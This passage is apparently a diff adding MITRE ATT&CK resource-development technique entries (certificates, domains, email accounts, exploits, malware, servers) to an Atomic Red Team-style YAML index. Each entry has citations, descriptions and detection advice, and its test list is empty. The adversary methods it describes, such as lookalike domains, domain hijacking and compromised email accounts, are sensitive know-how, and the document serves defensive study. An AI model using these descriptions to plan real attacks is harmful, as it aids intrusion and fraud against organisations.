Root Certificate](https://attack.mitre.org/techniques/T1553/004). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1588.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1588.004 + url: https://attack.mitre.org/techniques/T1588/004 + - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack + Shows Total Compromise of CA Servers. Retrieved March 6, 2017. + source_name: DiginotarCompromise + url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/ + - source_name: Let's Encrypt FAQ + url: https://letsencrypt.org/docs/faq/ + description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved + October 15, 2020. + - source_name: Splunk Kovar Certificates 2017 + url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html + description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL + Certificates. Retrieved October 16, 2020. + - source_name: Recorded Future Beacon Certificates + url: https://www.recordedfuture.com/cobalt-strike-servers/ + description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying + Rogue Cobalt Strike Servers. Retrieved October 16, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Digital Certificates + description: |- + Before compromising a victim, adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. + + Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) + + Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ) + + Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for. + id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-22T18:18:54.959Z' + created: '2020-10-01T02:14:18.044Z' + x_mitre_data_sources: + - SSL/TLS certificates + x_mitre_detection: |- + Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates) + + Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1583.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1583.001 + url: https://attack.mitre.org/techniques/T1583/001 + - external_id: CAPEC-630 + source_name: capec + url: https://capec.mitre.org/data/definitions/630.html + - source_name: CISA MSS Sep 2020 + url: https://us-cert.cisa.gov/ncas/alerts/aa20-258a + description: 'CISA. (2020, September 14). Alert (AA20-258A): Chinese Ministry + of State Security-Affiliated Cyber Threat Actor Activity. Retrieved October + 1, 2020.' + - source_name: FireEye APT28 + description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE + OPERATIONS?. Retrieved August 19, 2015.' + url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf + - source_name: PaypalScam + description: Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI' + scam. Retrieved March 2, 2017. + url: https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/ + - source_name: CISA IDN ST05-016 + url: https://us-cert.cisa.gov/ncas/tips/ST05-016 + description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding + Internationalized Domain Names. Retrieved October 20, 2020.' + - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf + description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage + Units. Retrieved July 18, 2016. + source_name: Mandiant APT1 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Domains + description: |- + Before compromising a victim, adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. + + Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016) + + Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) + id: attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-20T20:25:29.310Z' + created: '2020-09-30T17:09:31.878Z' + x_mitre_contributors: + - Wes Hurd + - Vinayak Wadhwa, Lucideus + - Deloitte Threat Library Team + x_mitre_data_sources: + - Domain registration + x_mitre_detection: |- + Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1584.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1584.001 + url: https://attack.mitre.org/techniques/T1584/001 + - source_name: ICANNDomainNameHijacking + description: 'ICANN Security and Stability Advisory Committee. (2005, July + 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved + March 6, 2017.' + url: https://www.icann.org/groups/ssac/documents/sac-007-en + - source_name: Microsoft Sub Takeover 2020 + url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover + description: Microsoft. (2020, September 29). Prevent dangling DNS entries + and avoid subdomain takeover. Retrieved October 12, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Domains + description: |- + Before compromising a victim, adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps. + + Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020) + id: attack-pattern--f9cc4d06-775f-4ee1-b401-4e2cc0da30ba + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-19T01:28:56.664Z' + created: '2020-10-01T00:51:28.513Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as during Command and Control. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1585.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1585.002 + url: https://attack.mitre.org/techniques/T1585/002 + - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf + description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage + Units. Retrieved July 18, 2016. + source_name: Mandiant APT1 + - source_name: Trend Micro R980 2016 + url: https://blog.trendmicro.com/trendlabs-security-intelligence/r980-ransomware-disposable-email-service/ + description: Antazo, F. and Yambao, M. (2016, August 10). R980 Ransomware + Found Abusing Disposable Email Address Service. Retrieved October 13, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Email Accounts + description: |- + Before compromising a victim, adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1) + + To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016) + id: attack-pattern--65013dd2-bc61-43e3-afb5-a14c4fa7437a + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-14T00:48:47.515Z' + created: '2020-10-01T01:09:53.217Z' + x_mitre_detection: 'Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1586.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1586.002 + url: https://attack.mitre.org/techniques/T1586/002 + - source_name: AnonHBGary + description: 'Bright, P. (2011, February 15). Anonymous speaks: the inside + story of the HBGary hack. Retrieved March 9, 2017.' + url: https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/ + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Email Accounts + description: |- + Before compromising a victim, adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)). + + A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. + + Adversaries can use a compromised email account to hijack existing email threads with targets of interest. + id: attack-pattern--3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-20T16:40:58.761Z' + created: '2020-10-01T01:20:53.104Z' + x_mitre_detection: 'Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1585: + technique: + external_references: + - source_name: mitre-attack + external_id: T1585 + url: https://attack.mitre.org/techniques/T1585 + - source_name: NEWSCASTER2014 + description: Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials + in Elaborate Social Media Attack Operation. Retrieved March 1, 2017. + url: https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation + - source_name: BlackHatRobinSage + description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved + March 6, 2017. + url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf + - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf + description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage + Units. Retrieved July 18, 2016. + source_name: Mandiant APT1 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Establish Accounts + description: |- + Before compromising a victim, adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) + + For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) + + Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) + id: attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-22T18:20:40.675Z' + created: '2020-10-01T01:05:42.216Z' + x_mitre_data_sources: + - Social media monitoring + x_mitre_detection: |- + Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization. + + Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - PRE + atomic_tests: [] + T1587.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1587.004 + url: https://attack.mitre.org/techniques/T1587/004 + - source_name: NYTStuxnet + description: William J. Broad, John Markoff, and David E. Sanger. (2011, January + 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved + March 1, 2017. + url: https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html + - source_name: Irongeek Sims BSides 2017 + url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims + description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for + Exploitation. Retrieved October 16, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Exploits + description: |- + Before compromising a victim, adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017) + + As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit. + + Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)). + id: attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-19T03:09:34.771Z' + created: '2020-10-01T01:48:15.511Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on behaviors relating to the use of exploits (i.e. + [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), + [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), + [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), + [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), + [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), + [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), + and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1588.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1588.005 + url: https://attack.mitre.org/techniques/T1588/005 + - source_name: Exploit Database + url: https://www.exploit-db.com/ + description: Offensive Security. (n.d.). Exploit Database. Retrieved October + 15, 2020. + - source_name: TempertonDarkHotel + description: Temperton, J. (2015, August 10). Hacking Team zero-day used in + new Darkhotel attacks. Retrieved March 9, 2017. + url: https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage + - source_name: NationsBuying + description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations + Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017. + url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html + - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/ + description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The + Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE + Human Rights Defender. Retrieved December 12, 2016.' + source_name: PegasusCitizenLab + - source_name: Wired SandCat Oct 2019 + url: https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec + description: Zetter, K. (2019, October 3). Researchers Say They Uncovered + Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved + October 15, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Exploits + description: |- + Before compromising a victim, adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying) + + In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel) + + An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation. + + Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)). + id: attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-18T21:47:09.385Z' + created: '2020-10-01T02:17:46.086Z' + x_mitre_detection: |2- + + Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1587.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1587.001 + url: https://attack.mitre.org/techniques/T1587/001 + - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf + description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage + Units. Retrieved July 18, 2016. + source_name: Mandiant APT1 + - source_name: Kaspersky Sofacy + description: Kaspersky Lab's Global Research and Analysis Team. (2015, December + 4). Sofacy APT hits high profile targets with updated toolset. Retrieved + December 10, 2015. + url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/ + - source_name: ActiveMalwareEnergy + description: Dan Goodin. (2014, June 30). Active malware operation let attackers + sabotage US energy industry. Retrieved March 9, 2017. + url: https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/ + - source_name: FBI Flash FIN7 USB + url: https://www.losangeles.va.gov/documents/MI-000120-MW.pdf + description: Federal Bureau of Investigation, Cyber Division. (2020, March + 26). FIN7 Cyber Actors Targeting US Businesses Through USB Keystroke Injection + Attacks. Retrieved October 14, 2020. + - source_name: FireEye APT29 + description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define + a Russian Cyber Threat Group. Retrieved September 17, 2015.' + url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Malware + description: |- + Before compromising a victim, adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors, packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB) + + As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware. + + Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29) + id: attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-22T13:05:43.492Z' + created: '2020-10-01T01:33:01.433Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on post-compromise phases of the adversary lifecycle. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1588.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1588.001 + url: https://attack.mitre.org/techniques/T1588/001 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Malware + description: |- + Before compromising a victim, adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors. + + In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries). + id: attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-15T20:46:54.437Z' + created: '2020-10-01T02:06:11.499Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on post-compromise phases of the adversary lifecycle. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1588: + technique: + external_references: + - source_name: mitre-attack + external_id: T1588 + url: https://attack.mitre.org/techniques/T1588 + - source_name: NationsBuying + description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations + Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017. + url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html + - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/ + description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The + Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE + Human Rights Defender. Retrieved December 12, 2016.' + source_name: PegasusCitizenLab + - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack + Shows Total Compromise of CA Servers. Retrieved March 6, 2017. + source_name: DiginotarCompromise + url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/ + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Obtain Capabilities + description: |- + Before compromising a victim, adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle. + + In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab) + + In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise) + id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-22T18:22:21.135Z' + created: '2020-10-01T01:56:24.776Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as during Defense Evasion or Command and Control. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - PRE + atomic_tests: [] + T1583.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1583.004 + url: https://attack.mitre.org/techniques/T1583/004 + - source_name: NYTStuxnet + description: William J. Broad, John Markoff, and David E. Sanger. (2011, January + 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved + March 1, 2017. + url: https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Server + description: |- + Before compromising a victim, adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, 